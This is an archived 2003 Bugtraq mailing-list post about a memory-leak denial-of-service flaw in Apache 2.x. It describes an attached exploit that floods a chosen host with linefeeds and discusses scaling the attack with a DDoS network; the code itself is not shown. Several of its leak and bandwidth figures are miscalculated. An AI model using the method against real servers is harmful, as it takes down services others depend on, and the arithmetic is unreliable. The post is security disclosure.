[29709] in bugtraq
Exploit Code Released for Apache 2.x Memory Leak
daemon@ATHENA.MIT.EDU (mattmurphy@kc.rr.com)
Wed Apr 9 23:28:59 2003
Message-ID: <29950-22003428224839770@M2W081.mail2web.com>
Reply-To: mattmurphy@kc.rr.com
From: "mattmurphy@kc.rr.com" <mattmurphy@kc.rr.com>
To: bugtraq@securityfocus.com
Date: Tue, 8 Apr 2003 18:48:39 -0400
"iDEFENSE Labs" <labs@idefense.com> writes:

>II. DESCRIPTION
>
>Remote exploitation of a memory leak in the Apache HTTP Server causes the
>daemon to over utilize system resources on an affected system. The problem
>is HTTP Server's handling of large chunks of consecutive linefeed
>characters. The web server allocates an eighty-byte buffer for each
>linefeed character without specifying an upper limit for allocation.
>Consequently, an attacker can remotely exhaust system resources by
>generating many requests containing these characters.

This is partially correct. Rather than "many requests containing these
characters", the more effective strategy is "many instances of this
character (these characters)".

>III. ANALYSIS
>
>While this type of attack is most effective in an intranet setting, remote
>exploitation over the Internet, while bandwidth intensive, is feasible.
>Remote exploitation could consume system resources on a targeted system
>and, in turn, render the Apache HTTP daemon unavailable.
Isn't that the truth? In a few minutes, my Apache used some 390 MB of
memory when tested. The statement that only 80 bytes is lost per newline
understates the issue in my opinion. If we multiply:
2 newlines: 160 bytes
4 newlines: 320 bytes
8 newlines: 640 bytes
16 newlines: 1280 bytes
32 newlines: 2560 bytes
64 newlines: 5120 bytes
128 newlines: 10240 bytes
256 newlines: 20480 bytes
512 newlines: 40960 bytes
1024 newlines: 81920 bytes
Worse, Apache doesn't require any form to the request whatsoever, so 1 KB
of 0x0A's is just as good as a well-formed request. Let's continue:
2 KB: 163840 bytes
4 KB: 655360 bytes
8 KB: 1310720 bytes
16 KB: 2621440 bytes
That's nearly 2 MB leaked in response to 16 KB. And these are just baseline
figures for the actual leak itself; they don't take into account various
other factors, including:
* Other use of memory by Apache
* The resources associated with the web session
>iDEFENSE has performed research using proof of concept exploit code to
>demonstrate the impact of this vulnerability.

I'm not seeing any example code, so let's try the attached.
"apache-massacre.c" allows the user to target a host/port of choice. It
uses a single-connection method, and is stopped with a simple CTRL+C
interrupt.

It sends the data (which is patterns of "\r\n") in "chunks". It sends a
pre-specified number of character sequences, and then checks the interrupt
flag for a request to terminate. Deployed on a high-bandwidth connection
(or a low-bandwidth connection with a lot of time to spare), it disables
Apache within seconds.

The attached code compiles cleanly on Win32, and *should* compile on any
POSIX-compliant system that offers a BSD socket interface.
>A successful exploitation scenario requires between two and
>seven megabytes of traffic exchange.

I hate to say, but I wonder where these figures come from. Obviously, a
machine with 16 MB RAM and a 512 MB hard drive is going to run out of
resources much faster than a machine with 512 MB RAM and a 100 GB hard
drive will. Also, "between two and seven megabytes of traffic exchange" is
very possible with a DDoSnet of some kind. With 10 connections at 1 Mbps
each (for a combined speed of 10 Mbps), approximately 1,750,000 bytes
(1.25 MB) is exchanged each second. This same speed is reached by the full
upload rates of many LAN-based providers (schools, for instance). Further,
a single cable modem has a link rate of 10 Mbps, held down only by ISP
capping.

In the situation of such a network (or a single uncapped cable modem), the
entire traffic exchange rate is hit within one second.
[Attachment: apache-massacre.c, application/octet-stream, base64-encoded]